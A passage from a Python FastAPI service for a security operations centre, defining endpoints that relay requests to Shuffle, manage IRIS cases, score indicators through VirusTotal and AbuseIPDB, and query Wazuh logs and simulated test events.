  646. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  647. return ApiResponse(data={"shuffle": result})
  648. @app.get(
  649. "/shuffle/apps",
  650. response_model=ApiResponse,
  651. summary="List Shuffle apps",
  652. description="List installed/available Shuffle apps from app API.",
  653. )
  654. async def shuffle_apps() -> ApiResponse:
  655. try:
  656. result = await shuffle_adapter.list_apps()
  657. except Exception as exc:
  658. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  659. return ApiResponse(data={"shuffle": result})
  660. @app.post(
  661. "/shuffle/proxy",
  662. response_model=ApiResponse,
  663. summary="Proxy request to Shuffle API",
  664. description="Forward arbitrary HTTP request to Shuffle API path via configured credentials.",
  665. )
  666. async def shuffle_proxy(payload: ShuffleProxyRequest) -> ApiResponse:
  667. path = payload.path if payload.path.startswith("/api/") else f"/api/v1/{payload.path.lstrip('/')}"
  668. try:
  669. result = await shuffle_adapter.proxy(
  670. method=payload.method,
  671. path=path,
  672. params=payload.params,
  673. payload=payload.payload,
  674. )
  675. except Exception as exc:
  676. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  677. return ApiResponse(data={"shuffle": result})
  678. @app.post(
  679. "/action/create-iris-case",
  680. response_model=ApiResponse,
  681. summary="Create IRIS case (action)",
  682. description="Create an IRIS case using action payload fields and defaults.",
  683. )
  684. async def create_iris_case(payload: ActionCreateIncidentRequest) -> ApiResponse:
  685. # IRIS v2 expects case_name, case_description, case_customer, case_soc_id.
  686. case_payload = {
  687. "case_name": payload.title,
  688. "case_description": payload.payload.get("description", "Created by soc-integrator"),
  689. "case_customer": payload.payload.get("case_customer", settings.iris_default_customer_id),
  690. "case_soc_id": payload.payload.get("case_soc_id", settings.iris_default_soc_id),
  691. }
  692. try:
  693. iris_result = await iris_adapter.create_case(case_payload)
  694. except Exception as exc:
  695. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  696. return ApiResponse(data={"iris": iris_result})
  697. @app.post(
  698. "/iris/tickets",
  699. response_model=ApiResponse,
  700. summary="Create IRIS ticket",
  701. description="Create an IRIS case/ticket directly using ticket request model.",
  702. )
  703. async def iris_create_ticket(payload: IrisTicketCreateRequest) -> ApiResponse:
  704. case_payload = {
  705. "case_name": payload.title,
  706. "case_description": payload.description,
  707. "case_customer": payload.case_customer or settings.iris_default_customer_id,
  708. "case_soc_id": payload.case_soc_id or settings.iris_default_soc_id,
  709. }
  710. if payload.payload:
  711. case_payload.update(payload.payload)
  712. try:
  713. iris_result = await iris_adapter.create_case(case_payload)
  714. except Exception as exc:
  715. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  716. return ApiResponse(data={"iris": iris_result})
  717. @app.get(
  718. "/iris/tickets",
  719. response_model=ApiResponse,
  720. summary="List IRIS tickets",
  721. description="List IRIS cases with pagination, using v2 or legacy fallback endpoint.",
  722. )
  723. async def iris_list_tickets(limit: int = 50, offset: int = 0) -> ApiResponse:
  724. try:
  725. iris_result = await iris_adapter.list_cases(limit=limit, offset=offset)
  726. except Exception as exc:
  727. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  728. return ApiResponse(data={"iris": iris_result})
  729. def _build_vt_ioc_result(
  730. vt: dict[str, object],
  731. ioc_type: str,
  732. ioc_value: str,
  733. malicious_threshold: int,
  734. suspicious_threshold: int,
  735. ) -> tuple[dict[str, object], bool, str, float]:
  736. stats = (
  737. (((vt.get("data") or {}).get("attributes") or {}).get("last_analysis_stats"))
  738. if isinstance(vt, dict)
  739. else None
  740. ) or {}
  741. malicious = int(stats.get("malicious", 0) or 0)
  742. suspicious = int(stats.get("suspicious", 0) or 0)
  743. harmless = int(stats.get("harmless", 0) or 0)
  744. undetected = int(stats.get("undetected", 0) or 0)
  745. total = malicious + suspicious + harmless + undetected
  746. confidence = 0.0 if total == 0 else round(((malicious + (0.5 * suspicious)) / total), 4)
  747. matched = (malicious >= malicious_threshold) or (suspicious >= suspicious_threshold)
  748. severity = "low"
  749. if malicious >= 5 or suspicious >= 10:
  750. severity = "critical"
  751. elif malicious >= 2 or suspicious >= 5:
  752. severity = "high"
  753. elif malicious >= 1 or suspicious >= 1:
  754. severity = "medium"
  755. reason = (
  756. f"virustotal_stats malicious={malicious} suspicious={suspicious} "
  757. f"thresholds(malicious>={malicious_threshold}, suspicious>={suspicious_threshold})"
  758. )
  759. result: dict[str, object] = {
  760. "ioc_type": ioc_type,
  761. "ioc_value": ioc_value,
  762. "matched": matched,
  763. "severity": severity,
  764. "confidence": confidence,
  765. "reason": reason,
  766. "providers": {
  767. "virustotal": {
  768. "stats": stats,
  769. }
  770. },
  771. "raw": {
  772. "virustotal": vt,
  773. },
  774. }
  775. return result, matched, severity, confidence
  776. def _build_abuseipdb_ioc_result(
  777. abuse: dict[str, object],
  778. ioc_value: str,
  779. confidence_threshold: int = 50,
  780. ) -> tuple[dict[str, object], bool, str, float]:
  781. data = ((abuse.get("data") if isinstance(abuse, dict) else None) or {}) if isinstance(abuse, dict) else {}
  782. score = int(data.get("abuseConfidenceScore", 0) or 0)
  783. total_reports = int(data.get("totalReports", 0) or 0)
  784. matched = score >= confidence_threshold
  785. severity = "low"
  786. if score >= 90:
  787. severity = "critical"
  788. elif score >= 70:
  789. severity = "high"
  790. elif score >= 30:
  791. severity = "medium"
  792. confidence = round(score / 100.0, 4)
  793. reason = f"abuseipdb score={score} totalReports={total_reports} threshold>={confidence_threshold}"
  794. result: dict[str, object] = {
  795. "ioc_type": "ip",
  796. "ioc_value": ioc_value,
  797. "matched": matched,
  798. "severity": severity,
  799. "confidence": confidence,
  800. "reason": reason,
  801. "providers": {"abuseipdb": {"score": score, "totalReports": total_reports, "raw": abuse}},
  802. }
  803. return result, matched, severity, confidence
  804. def _extract_first_array(payload: object) -> list[object]:
  805. if isinstance(payload, list):
  806. return payload
  807. if not isinstance(payload, dict):
  808. return []
  809. preferred_keys = [
  810. "items",
  811. "results",
  812. "workflows",
  813. "apps",
  814. "affected_items",
  815. "data",
  816. ]
  817. for key in preferred_keys:
  818. value = payload.get(key)
  819. if isinstance(value, list):
  820. return value
  821. for value in payload.values():
  822. extracted = _extract_first_array(value)
  823. if extracted:
  824. return extracted
  825. return []
  826. SIM_SCRIPT_MAP: dict[str, str] = {
  827. "fortigate": "send-wazuh-fortigate-test-events.sh",
  828. "endpoint": "send-wazuh-endpoint-agent-test-events.sh",
  829. "cisco": "send-wazuh-cisco-test-events.sh",
  830. "proposal_required": "send-wazuh-proposal-required-events.sh",
  831. "proposal_appendix_b": "send-wazuh-proposal-appendix-b-events.sh",
  832. "proposal_appendix_c": "send-wazuh-proposal-appendix-c-events.sh",
  833. "wazuh_test": "send-wazuh-test-events.sh",
  834. }
  835. def _build_sim_command(payload: SimLogRunRequest) -> list[str]:
  836. script_name = SIM_SCRIPT_MAP[payload.script]
  837. script_path = SIM_SCRIPTS_DIR / script_name
  838. count = max(1, int(payload.count))
  839. delay = max(0.0, float(payload.delay_seconds))
  840. if payload.script == "endpoint":
  841. cmd = [
  842. "/bin/bash",
  843. str(script_path),
  844. payload.target or "all",
  845. payload.scenario or "all",
  846. str(count),
  847. str(delay),
  848. ]
  849. else:
  850. cmd = [
  851. "/bin/bash",
  852. str(script_path),
  853. payload.target or "all",
  854. str(count),
  855. str(delay),
  856. ]
  857. if payload.forever:
  858. cmd.append("--forever")
  859. return cmd
  860. def _serialize_sim_run(run_id: str, run: dict[str, object]) -> dict[str, object]:
  861. process = run.get("process")
  862. poll_code = process.poll() if process else None
  863. return_code = run.get("return_code")
  864. if poll_code is not None and return_code is None:
  865. run["return_code"] = poll_code
  866. return_code = poll_code
  867. return {
  868. "run_id": run_id,
  869. "script": run.get("script"),
  870. "target": run.get("target"),
  871. "scenario": run.get("scenario"),
  872. "count": run.get("count"),
  873. "delay_seconds": run.get("delay_seconds"),
  874. "forever": run.get("forever"),
  875. "pid": run.get("pid"),
  876. "cmd": run.get("cmd"),
  877. "started_at": run.get("started_at"),
  878. "stopped_at": run.get("stopped_at"),
  879. "running": bool(process and process.poll() is None),
  880. "return_code": return_code,
  881. "log_file": run.get("log_file"),
  882. }
  883. def _tail_log_lines(path: Path, limit: int = 200) -> list[str]:
  884. line_limit = max(1, min(int(limit), 1000))
  885. lines: deque[str] = deque(maxlen=line_limit)
  886. try:
  887. with path.open("r", encoding="utf-8", errors="replace") as handle:
  888. for line in handle:
  889. lines.append(line.rstrip("\n"))
  890. except FileNotFoundError:
  891. return []
  892. return list(lines)
  893. def _safe_query_token(value: object) -> str | None:
  894. text = str(value or "").strip()
  895. if not text:
  896. return None
  897. if not re.fullmatch(r"[A-Za-z0-9_.:-]+", text):
  898. return None
  899. return text
  900. def _parse_iso_datetime(value: object) -> datetime | None:
  901. text = str(value or "").strip()
  902. if not text:
  903. return None
  904. if text.endswith("Z"):
  905. text = text[:-1] + "+00:00"
  906. try:
  907. parsed = datetime.fromisoformat(text)
  908. except ValueError:
  909. return None
  910. if parsed.tzinfo is None:
  911. parsed = parsed.replace(tzinfo=timezone.utc)
  912. return parsed.astimezone(timezone.utc)
  913. def _sim_wazuh_query_clauses(run: dict[str, object]) -> list[str]:
  914. script = str(run.get("script") or "").strip().lower()
  915. target = str(run.get("target") or "all").strip()
  916. scenario = str(run.get("scenario") or "all").strip().lower()
  917. target_token = _safe_query_token(target)
  918. _ = scenario
  919. clauses: list[str] = ["(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)"]
  920. if script == "fortigate":
  921. clauses.append(
  922. "(full_log:*fortigate* OR full_log:*FGT80F* OR full_log:*FGT60F* OR full_log:*FGT40F* "
  923. "OR full_log:*FGT501E* OR data.vendor:fortinet OR data.product:fortigate OR data.source:fortigate)"
  924. )
  925. if target_token and target_token.lower() != "all":
  926. clauses.append(f"(full_log:*{target_token}* OR data.model:{target_token})")
  927. elif script == "endpoint":
  928. if target_token and target_token.lower() != "all":
  929. lowered = target_token.lower()
  930. if lowered in {"windows", "win"}:
  931. clauses.append(
  932. "(full_log:*source=windows* OR full_log:*source=windows_agent* "
  933. "OR data.source:windows OR data.source:windows_agent OR data.platform:windows)"
  934. )
  935. elif lowered in {"mac", "macos"}:
  936. clauses.append(
  937. "(full_log:*source=mac* OR full_log:*source=mac_agent* "
  938. "OR data.source:mac OR data.source:mac_agent OR data.platform:mac)"
  939. )
  940. elif lowered == "linux":
  941. clauses.append(
  942. "(full_log:*source=linux* OR full_log:*source=linux_agent* "
  943. "OR data.source:linux OR data.source:linux_agent OR data.platform:linux)"
  944. )
  945. else:
  946. clauses.append(f"full_log:*{target_token}*")
  947. else:
  948. clauses.append(
  949. "(full_log:*source=windows* OR full_log:*source=windows_agent* "
  950. "OR full_log:*source=mac* OR full_log:*source=mac_agent* "
  951. "OR full_log:*source=linux* OR full_log:*source=linux_agent* "
  952. "OR data.source:windows OR data.source:windows_agent "
  953. "OR data.source:mac OR data.source:mac_agent "
  954. "OR data.source:linux OR data.source:linux_agent)"
  955. )
  956. elif script == "cisco":
  957. clauses.append("(full_log:*cisco* OR data.vendor:cisco)")
  958. if target_token and target_token.lower() != "all":
  959. clauses.append(f"full_log:*{target_token}*")
  960. elif script in {"proposal_required", "proposal_appendix_b", "proposal_appendix_c", "wazuh_test"}:
  961. clauses.append("(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)")
  962. if target_token and target_token.lower() != "all":
  963. clauses.append(f"full_log:*{target_token}*")
  964. else:
  965. clauses.append("full_log:*soc_mvp_test=true*")
  966. return clauses
  967. def _extract_wazuh_hits(payload: object) -> list[dict[str, object]]:
  968. if not isinstance(payload, dict):
  969. return []
  970. hits_root = payload.get("hits")
  971. if not isinstance(hits_root, dict):
  972. return []
  973. hits = hits_root.get("hits")
  974. if not isinstance(hits, list):
  975. return []
  976. result: list[dict[str, object]] = []
  977. for hit in hits:
  978. if isinstance(hit, dict):
  979. result.append(hit)
  980. return result
  981. def _extract_wazuh_event_item(hit: dict[str, object], include_raw: bool) -> dict[str, object]:
  982. source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {}
  983. source = source if isinstance(source, dict) else {}
  984. agent = source.get("agent") if isinstance(source.get("agent"), dict) else {}
  985. agent = agent if isinstance(agent, dict) else {}
  986. decoder = source.get("decoder") if isinstance(source.get("decoder"), dict) else {}
  987. decoder = decoder if isinstance(decoder, dict) else {}
  988. data = source.get("data") if isinstance(source.get("data"), dict) else {}
  989. data = data if isinstance(data, dict) else {}
  990. rule = source.get("rule") if isinstance(source.get("rule"), dict) else {}
  991. rule = rule if isinstance(rule, dict) else {}
  992. item: dict[str, object] = {
  993. "@timestamp": source.get("@timestamp") or source.get("timestamp"),
  994. "event_id": data.get("event_id") or source.get("id") or hit.get("_id"),
  995. "agent_name": agent.get("name"),
  996. "agent_id": agent.get("id"),
  997. "decoder_name": decoder.get("name"),
  998. "source": data.get("source"),
  999. "event_type": data.get("event_type"),
  1000. "severity": data.get("severity"),
  1001. "rule_id": rule.get("id"),
  1002. "rule_description": rule.get("description"),
  1003. "full_log": source.get("full_log"),
  1004. }
  1005. if include_raw:
  1006. item["raw"] = source
  1007. return item
  1008. def _extract_wazuh_rule_item(hit: dict[str, object], include_raw: bool) -> dict[str, object] | None:
  1009. source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {}
  1010. source = source if isinstance(source, dict) else {}
  1011. rule = source.get("rule") if isinstance(source.get("rule"), dict) else {}
  1012. rule = rule if isinstance(rule, dict) else {}
  1013. rule_id = rule.get("id")
  1014. if rule_id in {None, ""}:
  1015. return None
  1016. agent = source.get("agent") if isinstance(source.get("agent"), dict) else {}
  1017. agent = agent if isinstance(agent, dict) else {}
  1018. data = source.get("data") if isinstance(source.get("data"), dict) else {}
  1019. data = data if isinstance(data, dict) else {}
  1020. item: dict[str, object] = {
  1021. "@timestamp": source.get("@timestamp") or source.get("timestamp"),
  1022. "rule_id": rule_id,
  1023. "rule_level": rule.get("level"),
  1024. "rule_description": rule.get("description"),
  1025. "rule_firedtimes": rule.get("firedtimes"),
  1026. "event_id": data.get("event_id") or source.get("id") or hit.get("_id"),
  1027. "agent_name": agent.get("name"),
  1028. "full_log": source.get("full_log"),
  1029. }
  1030. if include_raw:
  1031. item["raw"] = source
  1032. return item
  1033. @app.post(
  1034. "/ioc/enrich",
  1035. response_model=ApiResponse,
  1036. summary="IOC enrich",
  1037. description="Fetch enrichment data for IOC from selected providers without final verdict scoring.",
  1038. )
  1039. async def ioc_enrich(payload: IocEnrichRequest) -> ApiResponse:
  1040. providers = [p.lower().strip() for p in payload.providers]
  1041. result: dict[str, object] = {
  1042. "ioc_type": payload.ioc_type,
  1043. "ioc_value": payload.ioc_value,
  1044. "providers_requested": providers,
  1045. "providers": {},
  1046. }
  1047. if "virustotal" in providers:
  1048. try:
  1049. vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
  1050. result["providers"] = {**(result.get("providers") or {}), "virustotal": vt}
  1051. except Exception as exc:
  1052. repo.add_ioc_trace(
  1053. action="enrich",
  1054. ioc_type=payload.ioc_type,
  1055. ioc_value=payload.ioc_value,
  1056. providers=providers,
  1057. request_payload=payload.model_dump(mode="json"),
  1058. response_payload={},
  1059. error=str(exc),
  1060. )
  1061. raise HTTPException(status_code=502, detail=f"VirusTotal call failed: {exc}") from exc
  1062. if "abuseipdb" in providers:
  1063. if payload.ioc_type != "ip":
  1064. result["providers"] = {
  1065. **(result.get("providers") or {}),
  1066. "abuseipdb": {"skipped": "AbuseIPDB currently supports ioc_type='ip' only"},
  1067. }
  1068. else:
  1069. try:
  1070. abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
  1071. result["providers"] = {**(result.get("providers") or {}), "abuseipdb": abuse}
  1072. except Exception as exc:
  1073. repo.add_ioc_trace(
  1074. action="enrich",
  1075. ioc_type=payload.ioc_type,
  1076. ioc_value=payload.ioc_value,
  1077. providers=providers,
  1078. request_payload=payload.model_dump(mode="json"),
  1079. response_payload={},
  1080. error=str(exc),
  1081. )
  1082. raise HTTPException(status_code=502, detail=f"AbuseIPDB call failed: {exc}") from exc
  1083. repo.add_ioc_trace(
  1084. action="enrich",
  1085. ioc_type=payload.ioc_type,
  1086. ioc_value=payload.ioc_value,
  1087. providers=providers,
  1088. request_payload=payload.model_dump(mode="json"),
  1089. response_payload=result,
  1090. )
  1091. return ApiResponse(data={"ioc": result})
  1092. @app.post(
  1093. "/ioc/evaluate",
  1094. response_model=ApiResponse,
  1095. summary="IOC evaluate",
  1096. description="Evaluate IOC against selected intelligence providers and return matched/severity/confidence.",
  1097. )
  1098. async def ioc_evaluate(payload: IocEvaluateRequest) -> ApiResponse:
  1099. providers = [p.lower().strip() for p in payload.providers]
  1100. supported = {"virustotal", "abuseipdb"}
  1101. requested = [p for p in providers if p in supported]
  1102. if not requested:
  1103. raise HTTPException(status_code=400, detail="No supported provider requested. Use ['virustotal'] or ['abuseipdb'].")
  1104. per_provider: dict[str, dict[str, object]] = {}
  1105. errors: dict[str, str] = {}
  1106. if "virustotal" in requested:
  1107. try:
  1108. vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
  1109. vt_result, _, _, _ = _build_vt_ioc_result(
  1110. vt=vt,
  1111. ioc_type=payload.ioc_type,
  1112. ioc_value=payload.ioc_value,
  1113. malicious_threshold=payload.malicious_threshold,
  1114. suspicious_threshold=payload.suspicious_threshold,
  1115. )
  1116. per_provider["virustotal"] = vt_result
  1117. except Exception as exc:
  1118. errors["virustotal"] = str(exc)
  1119. if "abuseipdb" in requested:
  1120. if payload.ioc_type != "ip":
  1121. errors["abuseipdb"] = "AbuseIPDB supports ioc_type='ip' only"
  1122. else:
  1123. try:
  1124. abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
  1125. abuse_result, _, _, _ = _build_abuseipdb_ioc_result(
  1126. abuse=abuse,
  1127. ioc_value=payload.ioc_value,
  1128. confidence_threshold=50,
  1129. )
  1130. per_provider["abuseipdb"] = abuse_result
  1131. except Exception as exc:
  1132. errors["abuseipdb"] = str(exc)
  1133. if not per_provider:
  1134. repo.add_ioc_trace(
  1135. action="evaluate",
  1136. ioc_type=payload.ioc_type,
  1137. ioc_value=payload.ioc_value,
  1138. providers=requested,
  1139. request_payload=payload.model_dump(mode="json"),
  1140. response_payload={},
  1141. error=str(errors),
  1142. )
  1143. raise HTTPException(status_code=502, detail=f"Provider evaluation failed: {errors}")
  1144. # aggregate decision (max confidence/severity, matched if any provider matched)
  1145. order = {"low": 1, "medium": 2, "high": 3, "critical": 4}
  1146. matched = any(bool(r.get("matched")) for r in per_provider.values())
  1147. confidence = max(float(r.get("confidence", 0.0) or 0.0) for r in per_provider.values())
  1148. severity = max((str(r.get("severity", "low")) for r in per_provider.values()), key=lambda x: order.get(x, 1))
  1149. reason_parts = [f"{name}:{res.get('reason','')}" for name, res in per_provider.items()]
  1150. if errors:
  1151. reason_parts.append(f"errors={errors}")
  1152. ioc_result = {
  1153. "ioc_type": payload.ioc_type,
  1154. "ioc_value": payload.ioc_value,
  1155. "matched": matched,
  1156. "severity": severity,
  1157. "confidence": round(confidence, 4),
  1158. "reason": " | ".join(reason_parts),
  1159. "providers": per_provider,
  1160. }
  1161. repo.add_ioc_trace(
  1162. action="evaluate",
  1163. ioc_type=payload.ioc_type,
  1164. ioc_value=payload.ioc_value,
  1165. providers=providers,
  1166. request_payload=payload.model_dump(mode="json"),
  1167. response_payload=ioc_result,
  1168. matched=matched,
  1169. severity=severity,
  1170. confidence=float(ioc_result["confidence"]),
  1171. )
  1172. return ApiResponse(data={"ioc": ioc_result})
  1173. @app.post(
  1174. "/ioc/upload-file",
  1175. response_model=ApiResponse,
  1176. summary="Upload file to VirusTotal",
  1177. description="Upload a file sample to VirusTotal and return upload/analysis identifiers.",
  1178. )
  1179. async def ioc_upload_file(file: UploadFile = File(...)) -> ApiResponse:
  1180. content = await file.read()
  1181. if not content:
  1182. raise HTTPException(status_code=400, detail="Uploaded file is empty")
  1183. try:
  1184. vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
  1185. except Exception as exc:
  1186. repo.add_ioc_trace(
  1187. action="upload_file",
  1188. ioc_type="hash",
  1189. ioc_value=file.filename or "<unknown>",
  1190. providers=["virustotal"],
  1191. request_payload={"filename": file.filename, "size": len(content)},
  1192. response_payload={},
  1193. error=str(exc),
  1194. )
  1195. raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
  1196. repo.add_ioc_trace(
  1197. action="upload_file",
  1198. ioc_type="hash",
  1199. ioc_value=file.filename or "<unknown>",
  1200. providers=["virustotal"],
  1201. request_payload={"filename": file.filename, "size": len(content)},
  1202. response_payload=vt_upload if isinstance(vt_upload, dict) else {"raw": str(vt_upload)},
  1203. )
  1204. return ApiResponse(data={"virustotal": vt_upload})
  1205. @app.get(
  1206. "/ioc/analysis/{analysis_id}",
  1207. response_model=ApiResponse,
  1208. summary="Get VirusTotal analysis",
  1209. description="Fetch analysis status/details from VirusTotal by analysis ID.",
  1210. )
  1211. async def ioc_get_analysis(analysis_id: str) -> ApiResponse:
  1212. try:
  1213. vt_analysis = await virustotal_adapter.get_analysis(analysis_id)
  1214. except Exception as exc:
  1215. repo.add_ioc_trace(
  1216. action="analysis",
  1217. ioc_type="hash",
  1218. ioc_value=analysis_id,
  1219. providers=["virustotal"],
  1220. request_payload={"analysis_id": analysis_id},
  1221. response_payload={},
  1222. error=str(exc),
  1223. )
  1224. raise HTTPException(status_code=502, detail=f"VirusTotal analysis fetch failed: {exc}") from exc
  1225. repo.add_ioc_trace(
  1226. action="analysis",
  1227. ioc_type="hash",
  1228. ioc_value=analysis_id,
  1229. providers=["virustotal"],
  1230. request_payload={"analysis_id": analysis_id},
  1231. response_payload=vt_analysis if isinstance(vt_analysis, dict) else {"raw": str(vt_analysis)},
  1232. )
  1233. return ApiResponse(data={"virustotal": vt_analysis})
  1234. @app.post(
  1235. "/ioc/evaluate-file",
  1236. response_model=ApiResponse,
  1237. summary="Evaluate uploaded file IOC",
  1238. description="Upload a file, poll analysis completion, fetch final file report, and return IOC verdict.",
  1239. )
  1240. async def ioc_evaluate_file(
  1241. file: UploadFile = File(...),
  1242. malicious_threshold: int = 1,
  1243. suspicious_threshold: int = 3,
  1244. poll_timeout_seconds: int = 30,
  1245. poll_interval_seconds: int = 2,
  1246. ) -> ApiResponse:
  1247. content = await file.read()
  1248. if not content:
  1249. raise HTTPException(status_code=400, detail="Uploaded file is empty")
  1250. try:
  1251. vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
  1252. except Exception as exc:
  1253. repo.add_ioc_trace(
  1254. action="evaluate_file",
  1255. ioc_type="hash",
  1256. ioc_value=file.filename or "<unknown>",
  1257. providers=["virustotal"],
  1258. request_payload={"filename": file.filename, "size": len(content)},
  1259. response_payload={},
  1260. error=str(exc),
  1261. )
  1262. raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
  1263. analysis_id = (
  1264. (((vt_upload.get("data") or {}).get("id")) if isinstance(vt_upload, dict) else None)
  1265. or ""
  1266. )
  1267. if not analysis_id:
  1268. raise HTTPException(status_code=502, detail="VirusTotal upload response missing analysis ID")
  1269. timeout = max(1, poll_timeout_seconds)
  1270. interval = max(1, poll_interval_seconds)
  1271. elapsed = 0
  1272. analysis: dict[str, object] = {}
  1273. while elapsed <= timeout:
  1274. analysis = await virustotal_adapter.get_analysis(analysis_id)
  1275. status = (
  1276. (((analysis.get("data") or {}).get("attributes") or {}).get("status"))
  1277. if isinstance(analysis, dict)
  1278. else None
  1279. )
  1280. if status == "completed":
  1281. break
  1282. await asyncio.sleep(interval)
  1283. elapsed += interval
  1284. sha256 = (
  1285. (((analysis.get("meta") or {}).get("file_info") or {}).get("sha256"))
  1286. if isinstance(analysis, dict)
  1287. else None
  1288. )
  1289. if not sha256:
  1290. raise HTTPException(status_code=502, detail="VirusTotal analysis did not return file hash yet")
  1291. try:
  1292. vt_file = await virustotal_adapter.enrich_ioc("hash", str(sha256))
  1293. except Exception as exc:
  1294. repo.add_ioc_trace(
  1295. action="evaluate_file",
  1296. ioc_type="hash",
  1297. ioc_value=str(sha256),
  1298. providers=["virustotal"],
  1299. request_payload={"filename": file.filename, "analysis_id": analysis_id},
  1300. response_payload={"upload": vt_upload, "analysis": analysis},
  1301. error=str(exc),
  1302. )
  1303. raise HTTPException(status_code=502, detail=f"VirusTotal report fetch failed: {exc}") from exc
  1304. ioc_result, matched, severity, confidence = _build_vt_ioc_result(
  1305. vt=vt_file,
  1306. ioc_type="hash",
  1307. ioc_value=str(sha256),
  1308. malicious_threshold=malicious_threshold,
  1309. suspicious_threshold=suspicious_threshold,
  1310. )
  1311. ioc_result["analysis_id"] = analysis_id
  1312. ioc_result["filename"] = file.filename
  1313. repo.add_ioc_trace(
  1314. action="evaluate_file",
  1315. ioc_type="hash",
  1316. ioc_value=str(sha256),
  1317. providers=["virustotal"],
  1318. request_payload={"filename": file.filename, "analysis_id": analysis_id},
  1319. response_payload={
  1320. "upload": vt_upload,
  1321. "analysis": analysis,
  1322. "ioc": ioc_result,
  1323. },
  1324. matched=matched,
  1325. severity=severity,
  1326. confidence=confidence,
  1327. )
  1328. return ApiResponse(data={"ioc": ioc_result, "analysis": analysis, "upload": vt_upload})
  1329. @app.get(
  1330. "/ioc/history",
  1331. response_model=ApiResponse,
  1332. summary="IOC trace history",
  1333. description="List recent IOC enrichment/evaluation trace records stored in database.",
  1334. )
  1335. async def ioc_history(limit: int = 50, offset: int = 0) -> ApiResponse:
  1336. return ApiResponse(data={"items": repo.list_ioc_trace(limit=limit, offset=offset)})
  1337. @app.get(
  1338. "/geoip/{ip}",
  1339. response_model=ApiResponse,
  1340. summary="GeoIP lookup",
  1341. description="Lookup geolocation for a public IP address using configured GeoIP provider.",
  1342. )
  1343. async def geoip_lookup(ip: str) -> ApiResponse:
  1344. result = await geoip_adapter.lookup(ip)
  1345. return ApiResponse(data={"geoip": result})
  1346. @app.get(
  1347. "/sync/wazuh-version",
  1348. response_model=ApiResponse,
  1349. summary="Wazuh version",
  1350. description="Get Wazuh API/manager version information through adapter.",
  1351. )
  1352. async def sync_wazuh_version() -> ApiResponse:
  1353. try:
  1354. wazuh_result = await wazuh_adapter.get_version()
  1355. except Exception as exc:
  1356. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1357. return ApiResponse(data={"wazuh": wazuh_result})
  1358. @app.get(
  1359. "/wazuh/auth-test",
  1360. response_model=ApiResponse,
  1361. summary="Wazuh auth test",
  1362. description="Validate Wazuh API authentication using configured credentials.",
  1363. )
  1364. async def wazuh_auth_test() -> ApiResponse:
  1365. try:
  1366. result = await wazuh_adapter.auth_test()
  1367. except Exception as exc:
  1368. raise HTTPException(status_code=502, detail=f"Wazuh auth failed: {exc}") from exc
  1369. return ApiResponse(data={"wazuh": result})
  1370. @app.get(
  1371. "/wazuh/manager-info",
  1372. response_model=ApiResponse,
  1373. summary="Wazuh manager info",
  1374. description="Return manager information from Wazuh API.",
  1375. )
  1376. async def wazuh_manager_info() -> ApiResponse:
  1377. try:
  1378. result = await wazuh_adapter.get_manager_info()
  1379. except Exception as exc:
  1380. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1381. return ApiResponse(data={"wazuh": result})
  1382. @app.get(
  1383. "/wazuh/agents",
  1384. response_model=ApiResponse,
  1385. summary="List Wazuh agents",
  1386. description="List registered Wazuh agents with pagination and optional field selection.",
  1387. )
  1388. async def wazuh_agents(
  1389. limit: int = 50,
  1390. offset: int = 0,
  1391. select: str | None = None,
  1392. ) -> ApiResponse:
  1393. try:
  1394. result = await wazuh_adapter.list_agents(limit=limit, offset=offset, select=select)
  1395. except Exception as exc:
  1396. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1397. return ApiResponse(data={"wazuh": result})
  1398. @app.get(
  1399. "/wazuh/alerts",
  1400. response_model=ApiResponse,
  1401. summary="List Wazuh alerts",
  1402. description="List alert-like entries from manager logs API for current Wazuh build.",
  1403. )
  1404. async def wazuh_alerts(
  1405. limit: int = 50,
  1406. offset: int = 0,
  1407. q: str | None = None,
  1408. sort: str | None = None,
  1409. ) -> ApiResponse:
  1410. try:
  1411. # In this Wazuh build, API alerts are exposed via manager logs.
  1412. result = await wazuh_adapter.list_manager_logs(
  1413. limit=limit, offset=offset, q=q, sort=sort
  1414. )
  1415. except Exception as exc:
  1416. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1417. return ApiResponse(data={"wazuh": result})
  1418. @app.get(
  1419. "/wazuh/manager-logs",
  1420. response_model=ApiResponse,
  1421. summary="List Wazuh manager logs",
  1422. description="Query manager logs endpoint with pagination and optional q/sort filters.",
  1423. )
  1424. async def wazuh_manager_logs(
  1425. limit: int = 50,
  1426. offset: int = 0,
  1427. q: str | None = None,
  1428. sort: str | None = None,
  1429. ) -> ApiResponse:
  1430. try:
  1431. result = await wazuh_adapter.list_manager_logs(
  1432. limit=limit, offset=offset, q=q, sort=sort
  1433. )
  1434. except Exception as exc:
  1435. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1436. return ApiResponse(data={"wazuh": result})
  1437. @app.post(
  1438. "/wazuh/sync-to-mvp",
  1439. response_model=ApiResponse,
  1440. dependencies=[Depends(require_internal_api_key)],
  1441. summary="Sync Wazuh to MVP",
  1442. description="Fetch Wazuh alerts from indexer and pass them through MVP ingest/evaluation logic.",
  1443. )
  1444. async def wazuh_sync_to_mvp(
  1445. limit: int = 50,
  1446. minutes: int = 120,
  1447. q: str = "soc_mvp_test=true OR event_type:*",
